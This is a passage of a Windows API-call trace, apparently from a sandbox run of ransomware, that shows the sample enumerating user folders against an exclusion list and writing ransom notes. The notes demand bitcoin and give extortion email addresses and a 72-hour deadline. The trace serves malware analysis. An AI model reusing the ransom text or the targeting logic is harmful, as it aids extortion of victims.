	[0181.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.151] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="system volume information") returned 0x0
	[0181.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.151] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0181.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.151] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="temp") returned 0x0
	[0181.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="program files") returned 0x0
	[0181.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="program files (x86)") returned 0x0
	[0181.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="appdata") returned 0x0
	[0181.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.152] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="application data") returned 0x0
	[0181.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="winnt") returned 0x0
	[0181.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="tmp") returned 0x0
	[0181.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="cache") returned 0x0
	[0181.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.153] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="temporary internet files") returned 0x0
	[0181.153] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.154] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="webcache") returned 0x0
	[0181.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.154] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="inetcache") returned 0x0
	[0181.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.154] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="nvidia") returned 0x0
	[0181.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.154] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="packages") returned 0x0
	[0181.154] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.155] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="cookies") returned 0x0
	[0181.155] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.155] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\contacts\\*.*", lpSrch="programdata") returned 0x0
	[0181.155] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0181.155] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0181.155] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8580caba, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0181.155] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0181.155] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0181.155] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8580caba, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8580caba, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8580caba, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0181.156] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x857e697d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x857e697d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x857e697d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0181.156] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x857e697d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x857e697d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x857e697d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0181.156] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0181.156] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0181.156] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1
	[0181.156] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1
	[0181.157] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1
	[0181.167] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0181.167] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0181.167] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Cookies" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Cookies") returned="C:\\Users\\RDhJ0CNFevzX\\Cookies"
	[0181.167] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Cookies" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Cookies") returned="C:\\Users\\RDhJ0CNFevzX\\Cookies"
	[0181.167] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Cookies\\") returned="C:\\Users\\RDhJ0CNFevzX\\Cookies\\"
	[0181.167] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Cookies\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Cookies\\") returned="C:\\Users\\RDhJ0CNFevzX\\Cookies\\"
	[0181.167] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Cookies\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Cookies\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Cookies\\*.*"
	[0181.167] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Cookies\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\cookies\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x857e697d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x857e697d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x857e697d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0181.168] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0181.168] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Cookies" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Cookies") returned="C:\\Users\\RDhJ0CNFevzX\\Cookies"
	[0181.168] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Cookies", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Cookies\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Cookies\\*.*"
	[0181.168] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.168] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.168] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Cookies\\HELP_DECRYPT_YOUR_FILES.TXT") returned 57
	[0181.168] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Cookies\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\cookies\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.170] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0181.171] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0181.174] CloseHandle (hObject=0x380) returned 1
	[0181.174] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.175] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0181.176] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0181.176] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Cookies\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\cookies\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.176] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0181.176] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0181.176] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0181.176] CloseHandle (hObject=0x380) returned 1
	[0181.177] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.177] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.177] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0181.177] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Cookies\\HELP_DECRYPT_YOUR_FILES.HTML") returned 58
	[0181.177] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Cookies\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\cookies\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.178] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0181.178] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0181.180] CloseHandle (hObject=0x380) returned 1
	[0181.181] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.181] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.181] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.182] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0181.183] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0181.183] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Cookies\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\cookies\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.183] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0181.183] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0181.183] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0181.184] CloseHandle (hObject=0x380) returned 1
	[0181.184] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Cookies\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\cookies\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x857e697d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x857e697d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x857e697d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0181.184] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0181.184] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58b39580, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x58b39580, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
	[0181.184] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1
	[0181.184] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1
	[0181.184] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0181.185] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0181.185] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Desktop" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop"
	[0181.185] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop"
	[0181.185] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.185] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.185] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*"
	[0181.185] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58b39580, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x58b39580, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0181.186] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*") returned 33
	[0181.186] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.186] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*", cchLength=0x21 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\*.*") returned 0x21
	[0181.186] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.186] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="windows") returned 0x0
	[0181.186] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.186] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="boot") returned 0x0
	[0181.186] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.187] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="system volume information") returned 0x0
	[0181.187] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.187] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0181.187] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.187] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="temp") returned 0x0
	[0181.187] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.187] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="program files") returned 0x0
	[0181.188] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.188] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="program files (x86)") returned 0x0
	[0181.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.351] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="appdata") returned 0x0
	[0181.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.351] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="application data") returned 0x0
	[0181.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.352] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="winnt") returned 0x0
	[0181.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.352] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="tmp") returned 0x0
	[0181.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.352] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="cache") returned 0x0
	[0181.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.352] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="temporary internet files") returned 0x0
	[0181.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.353] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="webcache") returned 0x0
	[0181.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.353] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="inetcache") returned 0x0
	[0181.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.353] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="nvidia") returned 0x0
	[0181.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.353] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="packages") returned 0x0
	[0181.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.354] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="cookies") returned 0x0
	[0181.354] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.354] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="programdata") returned 0x0
